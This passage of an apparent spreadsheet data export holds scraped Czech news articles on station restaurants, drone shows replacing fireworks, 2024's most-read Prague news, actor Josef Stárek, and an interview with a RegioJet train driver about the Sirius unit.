Anna, která s sebou má dvě děti. A co dál? Fastfood Podobně oblíbených podniků na nádraží je po České republice celá řada. Sice oblíbené, ale s postupující rekonstrukcí nádražních budov některé mizí. Postoj Správy železnic, které patří naprostá většina nádražních budov v zemi, je jasný. Budoucností nejsou klasické nádražky, ale kavárny a fastfoody. „Obecně jsou v dnešní době upřednostňovány fastfoody a bistra, a to díky rychlosti, cenové dostupnosti a pohodlí. Cestující na nádražích tráví mnohem méně času, rychlá obsluha je tak pro ně stěžejní. Fastfood restaurace nabízejí rozmanitou nabídku jídel, jsou schopny rychle reagovat na měnící se preference zákazníků a přizpůsobovat svou nabídku například rostlinnými variantami jídel, mezinárodní kuchyní atp. To oslovuje mladší zákazníky, kteří preferují vegetariánskou nebo veganskou stravu. Na nádražích jsou také velmi oblíbené kavárny a pekárny s doplňkovým prodejem teplých a studených nápojů. Sami provozovatelé nabízejí nové koncepty a trendy zaměřené na udržitelnost, které oslovují čím dál více zákazníků,“ vysvětlila pro deník FORUM 24 Nela Eberl Friebová, vedoucí tiskového oddělení Správy železnic. Fanoušci nádražek: Proč chodit jinam? Jiný názor na budoucnost nádražních restaurací mají lidé, kteří vedou portál a populární facebookovou stránku Vágus.cz. Ti jsou fanoušky nádražních restaurací, o kterých dělají pravidelné recenze a propagují je. „Kam jinam by lidé měli chodit?“ říkají v krátkém rozhovoru pro deník FORUM 24. Předpokládám, že nádražních restaurací nepřibývá, ale drží se jejich počet, nebo mizí a mizí? Nádražky naopak i přes nepřízeň osudu bují nevídaným tempem. Ostatně co je stánek před nádražím než právě embryo nádražky? O nádražkách se v poslední době více mluví. Myslíte si, že klasické nádražky nyní zažívají určitou „renesanci“ a navštěvují je nové skupiny hostů? Jednoznačně. Čím dál častěji vídáme početné party mladých, kteří zanevřeli na stylové kavárny a pochopili krásy teplého rumu nebo karbanátku s vlašským, nikoli bramborovým salátem. Existuje mezi nádražkami nějaká legendární, kterou musí každý milovník tohoto typu podniků navštívit? Je to známá Jedlová? Těžko posoudit. O Jedlové nedávno jistý autor poctivých průvodců prohlásil, že je to zaplivaná hospoda, kde mají jen pivo . Nejsme si proto jistí, zda afluentní Pražáci její půvab naplno docení. Jiné klenoty nádražního pohostinství zase mají otevíračku, která se nebezpečně kryje s pracovní dobou, tudíž poznávací zájezdy do Chrastavy , Otrokovic nebo Jablonce nutně vyžadují i svolení zaměstnavatele. Takže bychom nakonec asi doporučili Café Foyer na pražském hlavním nádraží – jen u kasy nezapomeňte říct, že vás tam poslali z Vágus.cz, možná dostanete slevu. Čím jsou pro vás nádražky tak zajímavé a lákavé? Proč je navštěvovat? Proč chodit jinam než do nádražek? Vždyť tam najdete vše, co průměrný konzument potřebuje ke štěstí. A pokud trváte na kávě z malých pražíren, znovu si kriticky zrekapitulujte své životní volby.</t>
  </si>
  <si>
    <t>20250101_356_3694050959_c5125d39c168ec4dc485.html</t>
  </si>
  <si>
    <t>c5125d39c168ec4dc485</t>
  </si>
  <si>
    <t>Už žádný rámus a&amp;nbsp;kouř. Mají dronové show potenciál nahradit ohňostroje?</t>
  </si>
  <si>
    <t>Už žádný rámus a&amp;nbsp;kouř. Mají dronové show potenciál nahradit ohňostroje? Dronová show na akci Vivid Sydney v červnu 2023. Technologie dronů zažívá boom. A to nejen na poli kurýrních služeb či válečných operací. Některá města začínají využívat dronové show místo ohňostrojů. Mají totiž řadu výhod, byť jsou tu i rizika. Budou drony létat i nad Prahou ? Novoroční ohňostroje nejsou pro každého. Pro mnohé je tento čas symbolem hluku, všudypřítomného zápachu střelného prachu a náhlého pocitu, že budou zase dva dny hledat svého vystrašeného psa po okolí. V některých městech však pomalu přecházejí na jiný způsob oslav. Způsob, který nezanechá hromady odpadu a velkou uhlíkovou stopu, sníží riziko výbuchů či popálenin. A hlavně, nedělá takový hluk. Jsou to drony, někdy až tisíce dronů. Magazín Seznam Zpráv Cestování | Jídlo | Životní styl | Architektura | Historie Když uvidíte vlka, nepanikařte, nejste v pohádce o Karkulce, říká odbornice V Mikulově vaří divoké pivo na pomezí piva a vína . Jak chutná? Kam cestovat v roce 2025? Nejlepší destinace podle Lonely Planet Aplikace, které vám pomohou dodržet novoroční předsevzetí 10 osvědčených superpotravin pro vaše zdraví Mnohá města ve Spojených státech dnes již upřednostňují drony při oslavách Dne nezávislosti, zejména v oblastech trpících suchem a požáry, jak píše server NPR. Dalším důvodem může být i znečištění ovzduší, negativní vliv na domácí mazlíčky, ale také dopad na lidi s psychickými obtížemi, nebo s posttraumatickým syndromem – například u bývalých vojáků a lidí prchajících před válkou. Světelné dronové show však nejsou úplnou novinkou ani v Česku. Už v roce 2023 se jich uskutečnilo nejméně 25 v několika českých městech. Sice to zatím není tak velkolepá podívaná jako na některých místech v zahraničí, ale to je nejspíš jen otázkou času. Choreografie a testy funkčnosti Návrh takové show nezačíná u strojů, ale u designování. „Vlastně na začátku o tu dronařinu vůbec nejde. Spíše jde o finální obrázek,“ říká Martin Saska z výzkumné skupiny Multirobotických systémů na ČVUT v Praze . „Jakmile mají organizátoři design té show, nastupuje počítačový software. Vypočítá trajektorie jednotlivých dronů tak, aby třeba přecházely z obrázku zeměkoule do obrázku rakety. Celá tato fáze může trvat i týdny,“ předestírá Saska. Dronové show se typicky připravují podobně jako velké organizované ohňostroje nebo jiné vizuální show. Mají pečlivě přichystanou choreografii, která se připravuje mnohem déle, než potom trvá. Organizátoři musejí také předem pečlivě zkontrolovat místo konání své show. Musejí dávat pozor například na elektromagnetické signály, které by mohly představení narušit. Zvážit ale také musejí výškové struktury jako jeřáby, nebo letecký provoz. Letka světelných dronů připravených vzlétnout. Jakmile jsou organizátoři připraveni, nahrají do jednotlivých dronů trajektorie a specifikují jim, v jaký čas mají být na kterých souřadnicích v prostoru. „Často se ty drony nechávají vzlétnout jen třeba do výšky tří metrů, aby se zjistilo, jestli opravdu vzlétnou všechny, a případně je technici vymění. U profesionálních velkých show s tisíci drony ale nevzlétnou třeba jen jednotky nebo menší desítky,“ nastiňuje Martin Saska. Když je ve vzduchu potřebný počet strojů, stačí už jen zmáčknout tlačítko start. „V ten moment je dron naprosto automaticky fungující systém,“ ubezpečuje odborník. Každý dron v sestavě si jen „odlétá“ svou choreografii a vrátí se zpět na zem. Vše řídí přesné programování počítačem. Světový rekord Na konci září letošního roku se čínská firma Damoda zapsala do Guinnessovy knihy rekordů uspořádáním show s největším počtem dronů ovládaných najednou jediným počítačem. Bylo jich celkem 10 197 a na obloze v Šen-čenu vykouzlily obrazy modelu města s mrakodrapy, letícího ptáka, běžícího člověka nebo dokonce vzdušné lodě s iluzí displeje na svém boku, na němž se promítá video. Létající tanečníci Představte si profesionální taneční skupinu. Během představení ví každý tanečník, v jaký okamžik má stát na jakém místě a který pohyb má udělat. Nemusí ani nijak komunikovat se zbytkem sboru, protože je choreografie pro všechny předem daná a nacvičená. Dronové show fungují velice podobně. Každý dron má konkrétní souřadnice v prostoru, na kterých se musí v konkrétní čas nacházet. Jsou přitom navrženy tak, aby se stroje nesrazily. Po představení se potom vrátí do své stanice na zemi, doplní baterii a celý proces se může opakovat s odlišnou choreografií na jiném místě. Co se týče organizace, dronové show nejsou zase tak odlišné od profesionálních velkých ohňostrojů. Ty totiž mají typicky také choreografii předem přesně naplánovanou v počítačovém softwaru. Drony mají ale nespornou výhodu – dají se použít znovu a znovu. Všechno má svůj háček Ve srovnání s ohňostroji mají tedy dronové show spoustu výhod. Ale tento fenomén má naopak také svá úskalí, a rozhodně nejsou zanedbatelná. Patří k nim třeba centralizovaný systém ovládání. Podobné show, jako bylo například rekordní představení v čínském Šen-čenu letos v září, mohou být řízeny pouze jedním počítačem v kombinaci se systémy GPS. Pokud se ovšem z jakéhokoliv důvodu tento jeden kontrolní počítač vypne, zasekne, nebo se do něj někdo nabourá, celé hejno dronů se může zřítit k zemi, jak už se ostatně stalo. Proto se kvůli bezpečnosti nemůže taková show odehrávat přímo nad hlavami lidí. Provádí se v bezpečné vzdálenosti, často například nad vodou. „Můžeme si ale představit i nějakého blázna, který si po domácku, za pár dolarů, vyrobí GPS rušičku podle návodu na internetu. A teď to pustí na nějaké velké show s desítkami tisíc dronů. Vtip je v tom, že ty drony by si pořád myslely, že dělají obrázek planety ve vzduchu, ale nevěděly by, že se ta planeta řítí na lidi dole,“ uvažuje Saska. Dalším rizikem je, že využívané drony jsou takzvaně slepé. Typicky nemají žádné senzory, aby spolu komunikovaly nebo si hlídaly své okolí. Neobsahují žádné nástroje umělé inteligence, aby se chovaly jako roj nebo hejno. Příkladem nebezpečí mohou být draví ptáci, kteří na dron zaútočí, protože si jej spletou s kořistí. Tento stroj přitom nemá žádný způsob, jak se dravcům vyhnout. „Ty drony se nemohou nahodile organizovat jako ryby v pohádce Hledá se Nemo a té kolizi zamezit,“ srovnává Martin Saska. A pak je tu cena. Pokud byste si chtěli dnes něco podobného objednat, můžete podle Saska počítat až s třikrát větší cenou než za tradiční profesionální ohňostroj. „Musíte v ceně počítat s pravidelnou výměnou baterií a drahou údržbou,“ vysvětluje odborník. Často podle něj přitom dronové show v Česku poptávají menší vesnice v domnění, že by mohly ušetřit. Umělá inteligence jako bezpečnostní prvek Vyšší cena však může být pro některé únosná. Zvláště když zde tolik nehrozí škody na majetku a zdraví. Kromě toho se dá předpokládat, že s rozvojem konkurence a technologií může jít cena dolů. Snížení ostatních rizik je pak otázkou vývoje zabezpečení. A v něm by mohla hrát roli například umělá inteligence, která se zatím u dronových show nijak nepoužívá. Podle Sasky by instalace senzorů a schopnosti dronů vyhodnocovat pohyby ostatních dronů v jejich okolí mohly výrazně omezit hrozby selhání centrálního počítače, a tedy odstranit některá výše zmíněná rizika. „My jsme třeba vyvinuli systém, který dokáže tu formaci držet pohromadě, i když nemá GPS signál. Kdyby nám teď někdo tu show narušil, naše zmiňovaná planeta by byla schopna odletět někam na pole za město a kontrolovaně přistát,“ vysvětluje expert z ČVUT . Česká firma předvedla show s 600 drony:</t>
  </si>
  <si>
    <t>20250101_357_3694049923_d8c51cd2de7db7c26251.html</t>
  </si>
  <si>
    <t>d8c51cd2de7db7c26251</t>
  </si>
  <si>
    <t>Dobré ráno: Baba Vanga děsí: V roce 2025 prý začne globálním válečným konfliktem konec světa</t>
  </si>
  <si>
    <t>20250101_358_3694016141_dd4e5017902f8823a05e.html</t>
  </si>
  <si>
    <t>dd4e5017902f8823a05e</t>
  </si>
  <si>
    <t>Přinášíme přehled nejčtenějších zpráv za rok 2024. Neunikla vám některá?</t>
  </si>
  <si>
    <t>Přinášíme přehled nejčtenějších zpráv za rok 2024. Neunikla vám některá? Velký zájem veřejnosti vzbudila několikatunová hromada oblečení, která se letos na podzim objevila před Palládiem na náměstí Republiky . Několika tunová hromada oblečení před Palladiem. | Video: Deník/Eliška Stodolová Později se ukázalo, že oblečení a textilní odpad zde umístilo město , aby poukázalo nejen na problémy s plýtváním textilu, ale i na jeho recyklaci. Oblečení si po pár dnech mohli lidé rozebírat, čehož část využila. Pražský lékař umístil ve své ordinaci nápis, ve kterém varuje pacienty před vakcínami proti covid-19 . Případem se začala zabývat i Česká lékařská komora (ČLK). Praha Nejen letos v létě dokázalo být počasí velmi nepříjemné. Meteorologové z Českého hydrometeorologického ústavu ( ČHMÚ ) vydávaly výstrahy i právě před silnými bouřkami. V červnu jsme poradili, jak se při bouřce chovat a co dělat, aby do vás neuhodil blesk. play_fill Praha S počasím se pojí i další článek, tentokrát od čtenářky Deníku . Ta zmapovala rozvodněnou Vltavu v centru města při povodňových hrozbách. Rozvodněná Vltava v centru Prahy . | Video: se svolením Michaely Krylové V letošním roce se objevily i tragédie, jedna z nich se stala v Chorvatsku rodině z Vinoře . Poblíž chorvatského města Obrovac nedaleko Zadaru došlo v červnu k výbuchu patrně v okolí auta, při kterém zemřelo dítě a dva lidé byli zraněni. Rodina navštívila vojenský prostor a odvezla si artefakt, který se později ukázal jako granát. Praha Během vydatných dešťů připravovala i Praha různá protipovodňová opatření. I když se naštěstí neopakoval scénář z roku 2022, voda se dostala do stanice metra Muzeum . Vstup do stanice byl omezen, některé vestibuly musel Dopravní podnik hl. m. Prahy ( DPP ) uzavřít. Déšť v metru na Muzeu | Video: Deník/Anna Bušková V pátek 23. února se v Břevnovském klášteře uskutečnil majestátní pohřeb členky známého rodu, Olgy Kočkové . Ta zemřela po několikaletém boji s vážnou nemocí. play_fill Praha Během rozlučkového aktu nechyběl ani velký kočár s koňmi i holubice. V jedné z pražských restaurací na Hradčanech se rozhořela kauza kolem údajného podvodu s čepovaným pivem . Podnik čelil obviněním, že místo plzeňského piva nabízí turistům levnější Braník z PET lahví. Případ se stal virálním po zveřejnění reportáže Janka Rubeše na jeho YouTubovém kanálu. play_fill Praha S podzimem začaly i výlovy rybníků a jinak tomu nebylo ani v hlavním městě. Praha se svými téměř 160 rybníky a vodními nádržemi tak nabídla zajímavou podívanou. Byli jsme u výlovu první části Motolských rybníků a objevili jsme nečekané poklady. Odhozená do přírody: Příběh želvy Berty z Motolského rybníka | Video: Deník/Anna Bušková Praha zažila v únoru letošního roku nával protestujících zemědělců , což způsobovalo mimo jiné i rozsáhlé problémy v dopravě. Do metropole zamířily kolony traktorů a zemědělské techniky z několika místa republiky, poté protestovali jak před Úřadem vlády, tak budovou ministerstva zemědělství. play_fill Praha Autor: Eliška Novotná Autor person Eliška Novotná</t>
  </si>
  <si>
    <t>20250101_359_3694048940_d9b59b972ee09edd1cd0.html</t>
  </si>
  <si>
    <t>d9b59b972ee09edd1cd0</t>
  </si>
  <si>
    <t>Denní výběr: Ve Svatavě řádil agresivní opilec. Skončil na záchytce s 3,72 promile</t>
  </si>
  <si>
    <t>20250101_36_3697612894_081b09ed7d7de772e124.html</t>
  </si>
  <si>
    <t>081b09ed7d7de772e124</t>
  </si>
  <si>
    <t>Josef Stárek alias Kája Kroupa ze Slunce, seno: Na sklonku života se živil jako prodejce párků v pražské zoo</t>
  </si>
  <si>
    <t>Josef Stárek alias Kája Kroupa ze Slunce, seno: Na sklonku života se živil jako prodejce párků v pražské zoo 3 min. 1. 1. 2025 „Blaženko, já Vás asi miluju, já si Vás asi vezmu“ je jedna z dobře známých hlášek, která zazněla v české komedii Zdeňka Trošky Slunce, seno a pár facek. Pronesl ji doktor Kája Kroupa, kterého ztvárnil Josef Stárek. Ten se měl stát manželem Blaženy Škopkové – ke svatbě ale nedošlo a ve třetím snímku této slavné trilogie je navíc odhaleno, že je pan doktor dokonce jinak orientován. Jak se Josef Stárek k natáčení dostal? REKLAMA Seznámili se v klubu Doktor Kája Kroupa je v trilogii Slunce, seno gay, a i jeho představitel Josef Stárek se svou orientací v reálném životě nijak netajil. S oblibou navštěvoval gay kluby a nijak se za to nestyděl. Pracoval v jednom pražském klubu jako číšník a nebylo tajemstvím, že se zde scházeli právě gayové. Restauraci U Petra Voka navštěvovala i Helena Růžičková , která tam s sebou jednou vzala i režiséra Zdeňka Trošku. Prostořeký číšník Josef jej natolik uchvátil, že se ho rozhodl obsadit do role Káji Kroupy – navzdory faktu, že to nebyl herec a roli již předtím přislíbil Oldřichu Kaiserovi . Nenechte si ujít: Tetris, Golden Axe či Prince of Persia aneb Co jsme pařili v 90. letech a jak to změnilo herní průmysl Josef Stárek usnadnil mužům coming out Josef Stárek se tak stal prvním známým gayem u nás, který se objevil ve filmu. Za svou orientaci se nestyděl a je pravdou, že mnoha stejně orientovaným mužům svou bezprostředností pomohl k tzv. coming outu. Společnost díky jeho účinkování ve filmu začala brát na vědomí, že i s gayi může být zábava a že jsou to fajn lidé. Zdeněk Troška nedlouho poté přiznal, že mu dokonce začaly chodit děkovné dopisy od pánů, kteří se oženili jen proto, aby svou orientaci zakryli. Poté ale vzali své ženy na Troškovy filmy do kina a po jejich skončení si s nimi povídali. A mnoho mužům to v životě mělo pomoci. Sláva mu stoupla do hlavy Účinkování ve dvou dílech oblíbených českých komedií přinesla doposud neznámému Josefu Stárkovi nebývalou slávu. Ta mu také poměrně rychle stoupla do hlavy. Dostávalo se mu nemalé pozornosti lidí i gay komunity, a to mu dělalo dobře. Jenže popularita s sebou přinášela i stinnou stránku. Josef Stárek se o tom sám na vlastní kůži přesvědčil, a to hned několikrát, když jej okradli mladí prostituti. Nakonec se vrátil k neherecké profesi – prodával párky ve stánku v pražské zoologické zahradě. Alkohol se na něm podepsal Zatímco ve filmu je Kája Kroupa spíše zdrženlivější, jeho představitel Josef Stárek si života uměl užívat naplno. Měl si dopřávat nadmíru alkoholu a navštěvovat divoké večírky. Jenže tohle všechno se na něm značně podepsalo. V roce 1998 v pouhých 48 letech zemřel na infarkt. Nenechte si ujít: Semirovi “táhne” na 60 a zplešatěl. Erdoğan Atalay drží Kobru 11 na vrcholu popularity už 28 let a točí dál Komedii Slunce, seno, erotika můžete zhlédnout ve středu 1. ledna od 20:20 na Nově a 5. ledna od 16:25. Zdroje: Sedmička, Blesk, Lui, Super Autor: Nikol Kolomazníková Autor person Nikol Kolomazníková Rubrika transition_slide Co sledovat v televizi</t>
  </si>
  <si>
    <t>20250101_360_3693969553_5d0135f0276f3dc9db60.html</t>
  </si>
  <si>
    <t>5d0135f0276f3dc9db60</t>
  </si>
  <si>
    <t>Denní výběr: Zastupitelé ve Stříbře udělili plakety hned čtyřem osobnostem města</t>
  </si>
  <si>
    <t>20250101_361_3693968923_039e6f70ae8b40a55afc.html</t>
  </si>
  <si>
    <t>039e6f70ae8b40a55afc</t>
  </si>
  <si>
    <t>Denní výběr: Nové přístroje v sokolovské nemocnici: lepší screening i rychlejší operace</t>
  </si>
  <si>
    <t>20250101_362_3693929990_75bc3694028d18c35fdc.html</t>
  </si>
  <si>
    <t>75bc3694028d18c35fdc</t>
  </si>
  <si>
    <t>20250101_363_3693936080_d51a3c4e6372c567b8ba.html</t>
  </si>
  <si>
    <t>d51a3c4e6372c567b8ba</t>
  </si>
  <si>
    <t>Rozhovor: Sirius je mazlík. Byla to láska na první pohled, říká strojvedoucí RegioJetu Jan Barilla</t>
  </si>
  <si>
    <t>Rozhovor: Sirius je mazlík. Byla to láska na první pohled, říká strojvedoucí RegioJetu Jan Barilla 01.01. 2025 6:00 Twitter Facebook Linkedin Oživit odstavenou soupravu Sirius trvá tři minuty a můžete jet. To jiná elektrická jednotka u nás neumí. Je sobota odpoledne. Na nástupišti mělnického nádraží vyhlížím rychlík od Ústí nad Labem . Vybírám si ho schválně. Je na něm nasazena čínská jednotka Sirius a veze ji strojvedoucí a instruktor strojvedoucích RegioJetu Jan Barilla. Pojedu s ním do Kolína a zpátky. Chceme dát řeč o tom, jaká je první elektrická jednotka z Číny schválená v EU. Být strojvedoucím byl jeho dětský sen, který se mu dlouhá léta neplnil. Původně je z Litoměřic a už jako malý chodíval poslouchat k trati zvuk rozjíždějících se peršingů. Byl ale krátkozraký, laserové operace očí tehdy neexistovaly, a v 80. letech takový uchazeč na mašinu nemohl. Vystudoval tak chemii, pracoval ve Spolchemii a pak začal podnikat, třeba s montováním autoalarmů. Když na něj po čtyřicítce zaútočila krize středního věku v kombinaci s únavou z podnikání, řekl si, že je čas si starý dětský sen plnit. Jako strojvedoucí začal u ČD Cargo, kde jezdil 7 let. A pak šel k RegioJetu . Proč jste odešel od nákladních vlaků vozit raději cestující? U carga jsme měli většinu šichet v noci, chtěl jsem jezdit ve dne. U nákladů je fajn, že děláte samostatnou práci a jste svým pánem. Ale na druhou stranu nemáte vůbec žádný kontakt s lidmi, možná po čtyřech stech kilometrech s posunovačem. Jste také neustále mimo civilizaci. Ranžíry, seřadiště, elektrárny… Bez šance se najíst v restauraci, protože nejbližší je čtyři kilometry od vás. Řadě lidí to vyhovuje, ale já jsem kvůli tomuhle režimu začal mít zdravotní problémy a začal jsem hodně ztrácet na váze. Musel jsem to řešit. Noční šichty a nepravidelný režim umí takhle rozhodit metabolismus? U mě se to stalo, proto jsem musel jít jinam. Kam všude jste jezdil s náklady? Byl jsem dálkař, vozili jsme hodně štěpku do papírny ve Štětí . Ta jezdí z Plané u Mariánských Lázní a také ze Ždírce nad Doubravou . Nejvíc jsem se tak najezdil na esech do Havlíčkova Brodu nebo do Plzně . Jedna z velkých výhod práce u RegioJetu je, že vím, kde začnu, kdy začnu, kde skončím a kdy skončím. Nastoupil jsem na rychlíky linky R23 z Ústí do Kolína , brigádně jsem také začal jezdit na elektrických Pesách. Jak jste se stal cvičným, tedy instruktorem strojvedoucích? Přihlásil jsem se do našeho interního výběrového řízení v RegioJetu UK . Dnes jsem na půl úvazku cvičnej a na půl úvazku strojvedoucí v regionální dopravě. Takže dnešní rychlík je pro vás brigáda pro radost? Vlastně jo. (směje se) Ale mě baví všechno, i ta Pesa. Jak se jezdí s elektrickými Pesami? Jste první, kdo je v Česku má. Je lehká a silná, takže je to něco neuvěřitelně živého. Pro strojvedoucího je tam pohodlí a ticho. I pro cestující je to proti motorákům, co tam dřív jezdívaly, skok do vesmíru. Kterou trať na severu Čech máte nejraději? Z Ústí do Děčína po střekovské straně. Je tam fantastická krajina kolem Labe. Louky, žádné náletové dřeviny … jak v pohádce. Které vlaky jsou na téhle trati nejplnější? Tady extra moc cestujících, pokud vím, nikdy nebývalo. Určitě školáky. A pak taky první vlak do Děčína , který vyjíždí po páté ráno z Ústí . Ten je solidně natřískaný. Jinak nejplnější pak bývají odpolední bílinky. Když se na to dívám jako strojvedoucí, řekl bych, že Pesy tu přitáhly další lidi do vlaků. Je to fakt velká změna. Kdy jste se dostal na Siriuse? Nejvíc jsem s ním byl před půl rokem, když jsme jezdili zkoušky ETCS. To jsme točili Beroun – Cheb pořád dokola, byl jsem tam snad týden v kuse. Jak to bude se Siriusy na lince R23? Teď jezdíme se dvěma jednotkami a z kraje roku 2025 počítáme s nasazením třetí, která je už na cestě. Před Vánocemi přijela do Česka . Sirius je první čínská jednotka pro cestující schválená v celé EU. Jak se s ní jezdí? Pro mě osobně je to láska na první pohled. Pro strojvedoucího je to fantazie. Uspořádání stanoviště, prostor na nohy, jak tady můžete sedět. To jsem nezažil. Hlavně ta neuvěřitelná jednoduchost stanoviště. A jezdí to fantasticky. Máme 12 fírů na R23, půlka Siriuse nemusí, a druhá půlka ho miluje. Je to tiché, měkké, pohodlné. Je to spolehlivá mašina? Naprosto. Od doby, co jsme je dostali, s nimi nebyl problém. Tahle jednička má najeto šedesát tisíc kilometrů, dvojka má aktuálně sto třicet tisíc. Šlapou jak hodinky. Proč je někteří strojvedoucí, jak jste říkal, nemusí? Někteří kolegové mají rádi svoje peršánky. Berou to tak, že Sirius je ježdění jak pro blbý, preferují klasické řízení velké lokomotivy. Ono je to proti strojům, které tady v Česku známe, opravdu extrémně jednoduché ovládání. Jak řešíte údržbu a případné opravy. Když se něco porouchá, budete volat do Číny ? Máme už vlastní údržbový tým. Po 16 tisících kilometrech jezdíme na pravidelnou údržbu do depa na pražském Zličíně . V případě oprav většího rozsahu máme samozřejmě k dispozici čínský servis. Blížíme se ke Kolínu , za chvilku bychom měli vjet pod dozor ETCS. Jaká je tu palubní jednotka? Čínská přímo od CRRC . Museli jsme najet při schvalování ETCS 20 tisíc kilometrů. Něco jsme najížděli na Uničovce, tam byla jedna jednotka, a druhá jezdila, jak jsem říkal, z Berouna do Chebu . Důležité byly hlavně přechody mezi národním zabezpečovačem a ETCS. Tam jsme využívali toho, že Plzeň ještě nebyla zapojená. A funguje v pohodě? Bez problémů od samotného začátku. Za pár minut to uvidíte sám. Měli jsme jen jednu závadu na Mirelu, ale ETCS v pohodě. Mirel a ETCS se mezi sebou nedohadují? Kupodivu ne. A to je Sirius specifický tím, že nemá řídící vůz, ale ta čela jsou dvě samostatné jednotky. Je to trošku zvláštní, je třeba myslet na to, že musíte dát vždy zabezpečovač po změně směru jízdy do provozního režimu. Solo Mirel je tady na tom stanovišti a pak je další samostatný na druhém. Jaké další zvláštnosti má Sirius? Máme hnané jen dva podvozky. Jsou to ty krajní na čelech. Je to lehká jednotka, na dešti jsou to sáně, ale ten Číňan si s tím umí poradit. Sám si zapískuje, při brždění si přibržďuje vzduchem, dobře fungují protismyky. Když se na to díváte po designové stránce, tak o tom vlaku můžeme diskutovat, ale po technické stránce je to dokonalý stroj. Jednotka má relativně krátké vložené vozy. Má to vliv na její chod? Co se týká prostředku vlaku, ani ne. Ale je hodně znát, že královský čep je daleko za mnou. Jak tu sedíme, tak čep podvozku je za námi asi dva a půl metru. Necelých pět a půl metru dopředu je ve vzduchu. A jak je ta pravobřežka rozbitá, hodně to trpí. Někdy jsou to silné rázy právě od prvního podvozku. Je to s tratí Lysá – Ústí opravdu tak špatné? Z mého pohledu katastrofální. O její rekonstrukci se mluví už léta. Celý úsek ze Střekova až po Mělník potřebuje opravu. Z Mělníka do Všetat pak dobrý, ale Všetaty jako stanice jsou také katastrofa. A pak už zase dobrý. Kromě Nymburka , to je železniční skanzen. Potkáváme se v sobotu odpoledne, jaká byla vaše dnešní šichta? Dneska to bylo zajímavé, byla napěťová výluka v Ústí na západě, abych se se Siriem dostal na Střekov , tak jsem musel jet přes Děčín . Byl to takový fajn soupravový ranní výlet. To je vlastně další výhoda Siria. Rychlá příprava jednotky. Když je odstavený, zabezpečený a vypnutý do baterií, tak přijdu, soupravu oživím a za tři minuty odjíždím kompletně po všech testech včetně platné zkoušky brzdy. Nevím o tom, že by to jiná jednotka uměla. Komunikuje s vámi vlak v češtině? Ano. Právě jsme minuli před Kolínem návěst, která nás upozornila na úsek pod ETCS. Tady v kabině to jen píplo. To je celé? Ano, jenom jsem potvrdil ten přechod. Mirel sám usnul, ETCS level 2 se probudilo. Je to jedno zapískání a jedno zmáčknutí tlačítka. Zbytek zvládne vlak sám. Už jsme ve stanici. Funguje to bez problémů. Říkal jste, že oživit soupravu a odjet s ní trvá jen tři minuty. Zastavili jsme u nástupiště. Kdybychom chtěli jednotku zabezpečit, odstavit a odejít, to by bylo na jak dlouho? Tak se dívejte. (V ten okamžik Jan Barilla udělá v kabině čtyři rychlé úkony). To je celé? Ano, teď je vlak zabržděný, zabezpečený proti vniknutí, můžeme jít. To bylo deset sekund. Já vím. Proč jste se rozhodl jít na konkurz instruktora strojvedoucích? Tuhle pozici mi nabídli už u ČD Carga, tehdy jsem to ale odmítl. Tam má instruktor trošku jinou náplň práce. Vyloženě učí a připravuje nabrané lidi na práci strojvedoucího, aby úspěšně získali licenci a složili zkoušku zvláštní odborné způsobilosti. Vlastně suplují práci lektorů. U RegioJetu je to jiné. Vedu agendu svých strojvedoucích, připravuju pro ně pravidelná školení v legislativě nebo technická školení. A pak je tu to nejdůležitější – správa a starost o rychloměry, archivování dat a jejich rozbory. No a také kontrolní činnost v provozu. Co řešíte se strojvedoucím, když vyrazíte na kontrolu do provozu? Na to je vypracovaný check list, který mám od vedení. Kontrolujeme i jízdní styl, ale s tou Pesou dnes všichni jezdit umí. Jde ale hlavně o to, aby všechny úkony dělali podle předpisů. Jasně, můžete namítnout, že když o mě strojvedoucí ví, tak si ohlídá, že je předpisový, a máte pravdu. Ale když mu tam vlezu nenápadně a vidím třeba, že nemá před sebou tabelární jízdní řád, tak to je špatně. Dnes je už máme elektronicky v tabletu, a pokud má tablet někde na dně batohu, je to nepřijatelné. Jak si rozumíte se strojvedoucími? Pořád jsem šéf, takže je to někdy těžší, ale myslím, že dobře. Naši fírové a jedna fířice jsou fajn. Ale byli samozřejmě i lidé, kterým jsem šlápl do jejich zažitého komfortu. To k tomu také patří. Dokážete včas poznat, z koho bude dobrý strojvedoucí a komu to prostě není souzeno? Ano. A už párkrát jsem také včas zasáhl. Myslím v případě, kdy to nesměřovalo správným směrem. To se občas stane, někomu to není dáno. Naposledy, když jsme se s jedním kolegou právě z takového důvodu ještě v jízdním zácviku rozloučili, byl nedlouho poté už v jiném zaměstnání na železnici součástí mimořádné události. Ale funguje to i naopak, že vás někdo neuvěřitelně překvapí. Teď tam mám třeba kluka, který přešel na strojvedoucího v zácviku z pozice dispečera. A ten mě naprosto vyzul z bot. V něm to je a z fleku by mohl jezdit sám. Jak se pozná dobrý strojvedoucí? Že umí mašinu poslouchat. Že ji vnímá takříkajíc prdelí. Kdo jsou vaši strojvedoucí na severu? Lidé, které jste si vychovali sami, nebo spíš hotoví fírové od jiných dopravců? Většina z nich je odjinud. Mix od nákladních i osobních dopravců. Orlen, Cargo, připravuje se u nás kluk z Metransu. Občas někdo z Arrivy , od ČD nebo z Länderbahnu. Vlastně od všech. Co je k vám láká? Čistá voňavá práce na nových vlacích. A jak často od vás strojvedoucí odchází? Skoro vůbec. Čím to je? Myslím, že tím že jsme menší. Všichni se známe a že jsme schopni odevzdávat trošku víc práce než u jiných dopravců. Ostatně díky tomu je i o něco lepší výplata. Řekl bych, že fungujeme mezi sebou trošku jako rodinná firma. Strojvedoucím se u RegioJetu líbí. Roli hraje i to, jak jsou sestavené turnusy a kolik jim vyjde volna v kuse. A nabíráte pořád nové strojvedoucí pro regionálku na severu Čech ? Teď ne, ale budeme se připravovat na takzvané velké Ústí. Tedy převzetí elektrických linek Dopravy Ústeckého kraje od Českých drah . To už nebudu mít třicet lidí, ale devadesát až sto. Práce bude daleko víc. Je cítit nějaké napětí mezi vámi a ČD, když jste vyhráli tendr Ústeckého kraje ? Je tam nevole od některých lidí. Od těch, co jsou hrdí na to, že jsou ČD a nás berou jako losery. Nechápou, že my nejsme České dráhy a děláme některou práci prostě jinak. Ale je to zpravidla o konkrétních lidech. Těšíte se na nové pantery ze Škody , s nimiž tu budete od prosince 2026 jezdit? No určitě. V čem jste na svoje strojvedoucí hrdý? Že práci, kterou dělají, odvádí svědomitě a bezpečně. Co vás baví mimo RegioJet ? Tím, že mám padesátku na krku, tak si už rád odpočinu. Ale baví mě muzicírování. Klávesy, saxofon, kytara. Ovšem trumpetu už dneska nedám, na tu jsem hrával kdysi dávno v orchestru. Už bych z ní asi nevyloudil 